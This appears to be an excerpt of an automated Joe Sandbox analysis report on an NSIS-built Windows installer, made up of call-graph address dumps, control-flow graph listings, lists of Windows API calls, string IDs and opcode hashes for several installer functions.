406d2b lstrlenW FindFirstFileW 3982->3985 3983->3982 3983->3985 3984 4062a3 11 API calls 3984->4012 3987 406e3b 3985->3987 3991 406d52 3985->3991 3988 406e6e 3986->3988 3987->3973 3990 4062a3 11 API calls 3988->3990 3989 405d06 CharNextW 3989->3991 3992 406e79 3990->3992 3991->3989 3995 406e18 FindNextFileW 3991->3995 4004 406c9b 72 API calls 3991->4004 4011 404f72 25 API calls 3991->4011 4013 4062a3 11 API calls 3991->4013 4014 404f72 25 API calls 3991->4014 4015 406c68 42 API calls 3991->4015 4017 406009 lstrcpynW 3991->4017 4018 405e30 GetFileAttributesW 3991->4018 3993 405e30 2 API calls 3992->3993 3994 406e81 RemoveDirectoryW 3993->3994 3998 406ec4 3994->3998 3999 406e8d 3994->3999 3995->3991 3997 406e30 FindClose 3995->3997 3997->3987 4000 404f72 25 API calls 3998->4000 3999->4001 4002 406e93 3999->4002 4000->4012 4001->3984 4003 4062a3 11 API calls 4002->4003 4005 406e9d 4003->4005 4004->3991 4007 404f72 25 API calls 4005->4007 4009 406ea7 4007->4009 4010 406c68 42 API calls 4009->4010 4010->4012 4011->3995 4012->3491 4012->3492 4013->3991 4014->3991 4015->3991 4016->3975 4017->3991 4019 405e4d DeleteFileW 4018->4019 4020 405e3f SetFileAttributesW 4018->4020 4019->3991 4020->4019 4021->3653 4022->3677 4023->3698 4024->3698 4025->3685 4027 406ae7 GetShortPathNameW 4026->4027 4028 406abe 4026->4028 4029 406b00 4027->4029 4030 406c62 4027->4030 4052 405e50 GetFileAttributesW CreateFileW 4028->4052 4029->4030 4032 406b08 WideCharToMultiByte 4029->4032 4030->3705 4032->4030 4034 406b25 WideCharToMultiByte 4032->4034 4033 406ac7 CloseHandle GetShortPathNameW 4033->4030 4035 406adf 4033->4035 4034->4030 4036 406b3d wsprintfA 4034->4036 4035->4027 4035->4030 4037 406805 18 API calls 4036->4037 4038 406b69 4037->4038 4053 405e50 GetFileAttributesW CreateFileW 4038->4053 4040 406b76 4040->4030 4041 406b83 GetFileSize GlobalAlloc 4040->4041 4042 406ba4 ReadFile 4041->4042 4043 406c58 CloseHandle 4041->4043 4042->4043 4044 406bbe 4042->4044 4043->4030 4044->4043 4054 405db6 lstrlenA 4044->4054 4047 406bd7 lstrcpyA 4050 406bf9 4047->4050 4048 406beb 4049 405db6 4 API calls 4048->4049 4049->4050 4051 406c30 SetFilePointer WriteFile GlobalFree 4050->4051 4051->4043 4052->4033 4053->4040 4055 405df7 lstrlenA 4054->4055 4056 405dd0 lstrcmpiA 4055->4056 4057 405dff 4055->4057 4056->4057 4058 405dee CharNextA 4056->4058 4057->4047 4057->4048 4058->4055 4939 402a84 4940 401553 19 API calls 4939->4940 4941 402a8e 4940->4941 4942 401446 18 API calls 4941->4942 4943 402a98 4942->4943 4944 401a13 4943->4944 4945 402ab2 RegEnumKeyW 4943->4945 4946 402abe RegEnumValueW 4943->4946 4947 402a7e 4945->4947 4946->4944 4946->4947 4947->4944 4948 4029e4 RegCloseKey 4947->4948 4948->4944 4949 402c8a 4950 402ca2 4949->4950 4951 402c8f 4949->4951 4953 40145c 18 API calls 4950->4953 4952 401446 18 API calls 4951->4952 4955 402c97 4952->4955 4954 402ca9 lstrlenW 4953->4954 4954->4955 4956 402ccb WriteFile 4955->4956 4957 401a13 4955->4957 4956->4957 4958 40400d 4959 40406a 4958->4959 4960 40401a lstrcpynA lstrlenA 4958->4960 4960->4959 4961 40404b 4960->4961 4961->4959 4962 404057 GlobalFree 4961->4962 4962->4959 4963 401d8e 4964 40145c 18 API calls 4963->4964 4965 401d95 ExpandEnvironmentStringsW 4964->4965 4966 401da8 4965->4966 4968 401db9 4965->4968 4967 401dad lstrcmpW 4966->4967 4966->4968 4967->4968 4969 401e0f 4970 401446 18 API calls 4969->4970 4971 401e17 4970->4971 4972 401446 18 API calls 4971->4972 4973 401e21 4972->4973 4974 4030e3 4973->4974 4976 405f51 wsprintfW 4973->4976 4976->4974 4977 402392 4978 40145c 18 API calls 4977->4978 4979 402399 4978->4979 4982 4071f8 4979->4982 4983 406ed2 25 API calls 4982->4983 4984 407218 4983->4984 4985 407222 lstrcpynW lstrcmpW 4984->4985 4986 4023a7 4984->4986 4987 407254 4985->4987 4988 40725a lstrcpynW 4985->4988 4987->4988 4988->4986 4059 402713 4074 406009 lstrcpynW 4059->4074 4061 40272c 4075 406009 lstrcpynW 4061->4075 4063 402738 4064 40145c 18 API calls 4063->4064 4066 402743 4063->4066 4064->4066 4065 402752 4068 40145c 18 API calls 4065->4068 4070 402761 4065->4070 4066->4065 4067 40145c 18 API calls 4066->4067 4067->4065 4068->4070 4069 40145c 18 API calls 4071 40276b 4069->4071 4070->4069 4072 4062a3 11 API calls 4071->4072 4073 40277f WritePrivateProfileStringW 4072->4073 4074->4061 4075->4063 4989 402797 4990 40145c 18 API calls 4989->4990 4991 4027ae 4990->4991 4992 40145c 18 API calls 4991->4992 4993 4027b7 4992->4993 4994 40145c 18 API calls 4993->4994 4995 4027c0 GetPrivateProfileStringW lstrcmpW 4994->4995 4996 402e18 4997 40145c 18 API calls 4996->4997 4998 402e1f FindFirstFileW 4997->4998 4999 402e32 4998->4999 5004 405f51 wsprintfW 4999->5004 5001 402e43 5005 406009 lstrcpynW 5001->5005 5003 402e50 5004->5001 5005->5003 5006 401e9a 5007 40145c 18 API calls 5006->5007 5008 401ea1 5007->5008 5009 401446 18 API calls 5008->5009 5010 401eab wsprintfW 5009->5010 4286 401a1f 4287 40145c 18 API calls 4286->4287 4288 401a26 4287->4288 4289 4062a3 11 API calls 4288->4289 4290 401a49 4289->4290 4291 401a64 4290->4291 4292 401a5c 4290->4292 4340 406009 lstrcpynW 4291->4340 4339 406009 lstrcpynW 4292->4339 4295 401a62 4299 406038 5 API calls 4295->4299 4296 401a6f 4297 406722 3 API calls 4296->4297 4298 401a75 lstrcatW 4297->4298 4298->4295 4301 401a81 4299->4301 4300 4062d5 2 API calls 4300->4301 4301->4300 4302 405e30 2 API calls 4301->4302 4304 401a98 CompareFileTime 4301->4304 4305 401ba9 4301->4305 4309 4062a3 11 API calls 4301->4309 4313 406009 lstrcpynW 4301->4313 4319 406805 18 API calls 4301->4319 4326 405ca0 MessageBoxIndirectW 4301->4326 4330 401b50 4301->4330 4337 401b5d 4301->4337 4338 405e50 GetFileAttributesW CreateFileW 4301->4338 4302->4301 4304->4301 4306 404f72 25 API calls 4305->4306 4308 401bb3 4306->4308 4307 404f72 25 API calls 4310 401b70 4307->4310 4311 40337f 37 API calls 4308->4311 4309->4301 4314 4062a3 11 API calls 4310->4314 4312 401bc6 4311->4312 4315 4062a3 11 API calls 4312->4315 4313->4301 4321 401b8b 4314->4321 4316 401bda 4315->4316 4317 401be9 SetFileTime 4316->4317 4318 401bf8 CloseHandle 4316->4318 4317->4318 4320 401c09 4318->4320 4318->4321 4319->4301 4322 401c21 4320->4322 4323 401c0e 4320->4323 4325 406805 18 API calls 4322->4325 4324 406805 18 API calls 4323->4324 4327 401c16 lstrcatW 4324->4327 4328 401c29 4325->4328 4326->4301 4327->4328 4329 4062a3 11 API calls 4328->4329 4331 401c34 4329->4331 4332 401b93 4330->4332 4333 401b53 4330->4333 4334 405ca0 MessageBoxIndirectW 4331->4334 4335 4062a3 11 API calls 4332->4335 4336 4062a3 11 API calls 4333->4336 4334->4321 4335->4321 4336->4337 4337->4307 4338->4301 4339->4295 4340->4296 5011 40209f GetDlgItem GetClientRect 5012 40145c 18 API calls 5011->5012 5013 4020cf LoadImageW SendMessageW 5012->5013 5014 4030e3 5013->5014 5015 4020ed DeleteObject 5013->5015 5015->5014 5016 402b9f 5017 401446 18 API calls 5016->5017 5022 402ba7 5017->5022 5018 402c4a 5019 402bdf ReadFile 5021 402c3d 5019->5021 5019->5022 5020 401446 18 API calls 5020->5021 5021->5018 5021->5020 5028 402d17 ReadFile 5021->5028 5022->5018 5022->5019 5022->5021 5023 402c06 MultiByteToWideChar 5022->5023 5024 402c3f 5022->5024 5026 402c4f 5022->5026 5023->5022 5023->5026 5029 405f51 wsprintfW 5024->5029 5026->5021 5027 402c6b SetFilePointer 5026->5027 5027->5021 5028->5021 5029->5018 5030 402b23 GlobalAlloc 5031 402b39 5030->5031 5032 402b4b 5030->5032 5033 401446 18 API calls 5031->5033 5034 40145c 18 API calls 5032->5034 5035 402b41 5033->5035 5036 402b52 WideCharToMultiByte lstrlenA 5034->5036 5037 402b93 5035->5037 5038 402b84 WriteFile 5035->5038 5036->5035 5038->5037 5039 402384 GlobalFree 5038->5039 5039->5037 5041 4044a5 5042 404512 5041->5042 5043 4044df 5041->5043 5045 40451f GetDlgItem GetAsyncKeyState 5042->5045 5052 4045b1 5042->5052 5109 405c84 GetDlgItemTextW 5043->5109 5048 40453e GetDlgItem 5045->5048 5055 40455c 5045->5055 5046 4044ea 5049 406038 5 API calls 5046->5049 5047 40469d 5107 404833 5047->5107 5111 405c84 GetDlgItemTextW 5047->5111 5050 403d3f 19 API calls 5048->5050 5051 4044f0 5049->5051 5054 404551 ShowWindow 5050->5054 5057 403e74 5 API calls 5051->5057 5052->5047 5058 406805 18 API calls 5052->5058 5052->5107 5054->5055 5060 404579 SetWindowTextW 5055->5060 5065 405d59 4 API calls 5055->5065 5056 403dca 8 API calls 5061 404847 5056->5061 5062 4044f5 GetDlgItem 5057->5062 5063 40462f SHBrowseForFolderW 5058->5063 5059 4046c9 5064 40677e 18 API calls 5059->5064 5066 403d3f 19 API calls 5060->5066 5067 404503 IsDlgButtonChecked 5062->5067 5062->5107 5063->5047 5068 404647 CoTaskMemFree 5063->5068 5069 4046cf 5064->5069 5070 40456f 5065->5070 5071 404597 5066->5071 5067->5042 5072 406722 3 API calls 5068->5072 5112 406009 lstrcpynW 5069->5112 5070->5060 5076 406722 3 API calls 5070->5076 5073 403d3f 19 API calls 5071->5073 5074 404654 5072->5074 5077 4045a2 5073->5077 5078 40468b SetDlgItemTextW 5074->5078 5083 406805 18 API calls 5074->5083 5076->5060 5110 403d98 SendMessageW 5077->5110 5078->5047 5079 4046e6 5081 4062fc 3 API calls 5079->5081 5090 4046ee 5081->5090 5082 4045aa 5086 4062fc 3 API calls 5082->5086 5084 404673 lstrcmpiW 5083->5084 5084->5078 5087 404684 lstrcatW 5084->5087 5085 404730 5113 406009 lstrcpynW 5085->5113 5086->5052 5087->5078 5089 404739 5091 405d59 4 API calls 5089->5091 5090->5085 5095 406751 2 API calls 5090->5095 5096 404785 5090->5096 5092 40473f GetDiskFreeSpaceW 5091->5092 5094 404763 MulDiv 5092->5094 5092->5096 5094->5096 5095->5090 5098 4047e2 5096->5098 5099 4043ad 21 API calls 5096->5099 5097 404805 5114 403d85 KiUserCallbackDispatcher 5097->5114 5098->5097 5100 40141d 80 API calls 5098->5100 5101 4047d3 5099->5101 5100->5097 5103 4047e4 SetDlgItemTextW 5101->5103 5104 4047d8 5101->5104 5103->5098 5105 4043ad 21 API calls 5104->5105 5105->5098 5106 404821 5106->5107 5115 403d61 5106->5115 5107->5056 5109->5046 5110->5082 5111->5059 5112->5079 5113->5089 5114->5106 5116 403d74 SendMessageW 5115->5116 5117 403d6f 5115->5117 5116->5107 5117->5116 5118 402da5 5119 4030e3 5118->5119 5120 402dac 5118->5120 5121 401446 18 API calls 5120->5121 5122 402db8 5121->5122 5123 402dbf SetFilePointer 5122->5123 5123->5119 5124 402dcf 5123->5124 5124->5119 5126 405f51 wsprintfW 5124->5126 5126->5119 5127 4030a9 SendMessageW 5128 4030c2 InvalidateRect 5127->5128 5129 4030e3 5127->5129 5128->5129 5130 401cb2 5131 40145c 18 API calls 5130->5131 5132 401c54 5131->5132 5133 4062a3 11 API calls 5132->5133 5136 401c64 5132->5136 5134 401c59 5133->5134 5135 406c9b 81 API calls 5134->5135 5135->5136 4086 4021b5 4087 40145c 18 API calls 4086->4087 4088 4021bb 4087->4088 4089 40145c 18 API calls 4088->4089 4090 4021c4 4089->4090 4091 40145c 18 API calls 4090->4091 4092 4021cd 4091->4092 4093 40145c 18 API calls 4092->4093 4094 4021d6 4093->4094 4095 404f72 25 API calls 4094->4095 4096 4021e2 ShellExecuteW 4095->4096 4097 40221b 4096->4097 4098 40220d 4096->4098 4100 4062a3 11 API calls 4097->4100 4099 4062a3 11 API calls 4098->4099 4099->4097 4101 402230 4100->4101 5144 402238 5145 40145c 18 API calls 5144->5145 5146 40223e 5145->5146 5147 4062a3 11 API calls 5146->5147 5148 40224b 5147->5148 5149 404f72 25 API calls 5148->5149 5150 402255 5149->5150 5151 405c3f 2 API calls 5150->5151 5152 40225b 5151->5152 5153 4062a3 11 API calls 5152->5153 5156 4022ac CloseHandle 5152->5156 5159 40226d 5153->5159 5155 4030e3 5156->5155 5157 402283 WaitForSingleObject 5158 402291 GetExitCodeProcess 5157->5158 5157->5159 5158->5156 5161 4022a3 5158->5161 5159->5156 5159->5157 5160 406332 2 API calls 5159->5160 5160->5157 5163 405f51 wsprintfW 5161->5163 5163->5156 5164 4040b8 5165 4040d3 5164->5165 5173 404201 5164->5173 5169 40410e 5165->5169 5195 403fca WideCharToMultiByte 5165->5195 5166 40426c 5167 404276 GetDlgItem 5166->5167 5168 40433e 5166->5168 5170 404290 5167->5170 5171 4042ff 5167->5171 5174 403dca 8 API calls 5168->5174 5176 403d3f 19 API calls 5169->5176 5170->5171 5179 4042b6 6 API calls 5170->5179 5171->5168 5180 404311 5171->5180 5173->5166 5173->5168 5175 40423b GetDlgItem SendMessageW 5173->5175 5178 404339 5174->5178 5200 403d85 KiUserCallbackDispatcher 5175->5200 5177 40414e 5176->5177 5182 403d3f 19 API calls 5177->5182 5179->5171 5183 404327 5180->5183 5184 404317 SendMessageW 5180->5184 5187 40415b CheckDlgButton 5182->5187 5183->5178 5188 40432d SendMessageW 5183->5188 5184->5183 5185 404267 5186 403d61 SendMessageW 5185->5186 5186->5166 5198 403d85 KiUserCallbackDispatcher 5187->5198 5188->5178 5190 404179 GetDlgItem 5199 403d98 SendMessageW 5190->5199 5192 40418f SendMessageW 5193 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5192->5193 5194 4041ac GetSysColor 5192->5194 5193->5178 5194->5193 5196 404007 5195->5196 5197 403fe9 GlobalAlloc WideCharToMultiByte 5195->5197 5196->5169 5197->5196 5198->5190 5199->5192 5200->5185 4195 401eb9 4196 401f24 4195->4196 4197 401ec6 4195->4197 4198 401f53 GlobalAlloc 4196->4198 4199 401f28 4196->4199 4200 401ed5 4197->4200 4207 401ef7 4197->4207 4201 406805 18 API calls 4198->4201 4206 4062a3 11 API calls 4199->4206 4211 401f36 4199->4211 4202 4062a3 11 API calls 4200->4202 4205 401f46 4201->4205 4203 401ee2 4202->4203 4208 402708 4203->4208 4213 406805 18 API calls 4203->4213 4205->4208 4209 402387 GlobalFree 4205->4209 4206->4211 4217 406009 lstrcpynW 4207->4217 4209->4208 4219 406009 lstrcpynW 4211->4219 4212 401f06 4218 406009 lstrcpynW 4212->4218 4213->4203 4215 401f15 4220 406009 lstrcpynW 4215->4220 4217->4212 4218->4215 4219->4205 4220->4208 5201 4074bb 5203 407344 5201->5203 5202 407c6d 5203->5202 5204 4073c2 GlobalFree 5203->5204 5205 4073cb GlobalAlloc 5203->5205 5206 407443 GlobalAlloc 5203->5206 5207 40743a GlobalFree 5203->5207 5204->5205 5205->5202 5205->5203 5206->5202 5206->5203 5207->5206

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • #17.COMCTL32 ref: 004038A2
                                                                                                                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                                                                                                    • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                    • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                    • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                  • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                                                                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                  • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                                                                                                  • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                                                                                                  • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                                                                                                  • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                                                                                                  • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                                                                                                  • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                                                                                                  • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                                                                                                  • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                                                                                                  • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                                                                                                  • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                  • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                                                                                                  • API String ID: 2435955865-239407132
                                                                                                                                                                                  • Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                  • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                  • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                                                                                                                                  Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 886 4074bb-4074c0 887 4074c2-4074ef 886->887 888 40752f-407547 886->888 890 4074f1-4074f4 887->890 891 4074f6-4074fa 887->891 889 407aeb-407aff 888->889 895 407b01-407b17 889->895 896 407b19-407b2c 889->896 892 407506-407509 890->892 893 407502 891->893 894 4074fc-407500 891->894 897 407527-40752a 892->897 898 40750b-407514 892->898 893->892 894->892 899 407b33-407b3a 895->899 896->899 902 4076f6-407713 897->902 903 407516 898->903 904 407519-407525 898->904 900 407b61-407c68 899->900 901 407b3c-407b40 899->901 917 407350 900->917 918 407cec 900->918 906 407b46-407b5e 901->906 907 407ccd-407cd4 901->907 909 407715-407729 902->909 910 40772b-40773e 902->910 903->904 905 407589-4075b6 904->905 913 4075d2-4075ec 905->913 914 4075b8-4075d0 905->914 906->900 911 407cdd-407cea 907->911 915 407741-40774b 909->915 910->915 916 407cef-407cf6 911->916 919 4075f0-4075fa 913->919 914->919 920 40774d 915->920 921 4076ee-4076f4 915->921 922 407357-40735b 917->922 923 40749b-4074b6 917->923 924 40746d-407471 917->924 925 4073ff-407403 917->925 918->916 928 407600 919->928 929 407571-407577 919->929 930 407845-4078a1 920->930 931 4076c9-4076cd 920->931 921->902 927 407692-40769c 921->927 922->911 932 407361-40736e 922->932 923->889 937 407c76-407c7d 924->937 938 407477-40748b 924->938 943 407409-407420 925->943 944 407c6d-407c74 925->944 933 4076a2-4076c4 927->933 934 407c9a-407ca1 927->934 946 407556-40756e 928->946 947 407c7f-407c86 928->947 935 40762a-407630 929->935 936 40757d-407583 929->936 930->889 939 407c91-407c98 931->939 940 4076d3-4076eb 931->940 932->918 948 407374-4073ba 932->948 933->930 934->911 949 40768e 935->949 950 407632-40764f 935->950 936->905 936->949 937->911 945 40748e-407496 938->945 939->911 940->921 951 407423-407427 943->951 944->911 945->924 955 407498 945->955 946->929 947->911 953 4073e2-4073e4 948->953 954 4073bc-4073c0 948->954 949->927 956 407651-407665 950->956 957 407667-40767a 950->957 951->925 952 407429-40742f 951->952 959 407431-407438 952->959 960 407459-40746b 952->960 963 4073f5-4073fd 953->963 964 4073e6-4073f3 953->964 961 4073c2-4073c5 GlobalFree 954->961 962 4073cb-4073d9 GlobalAlloc 954->962 955->923 958 40767d-407687 956->958 957->958 958->935 965 407689 958->965 966 407443-407453 GlobalAlloc 959->966 967 40743a-40743d GlobalFree 959->967 960->945 961->962 962->918 968 4073df 962->968 963->951 964->963 964->964 970 407c88-407c8f 965->970 971 40760f-407627 965->971 966->918 966->960 967->966 968->953 970->911 971->935
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                  • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                  • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                                                                                                  Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
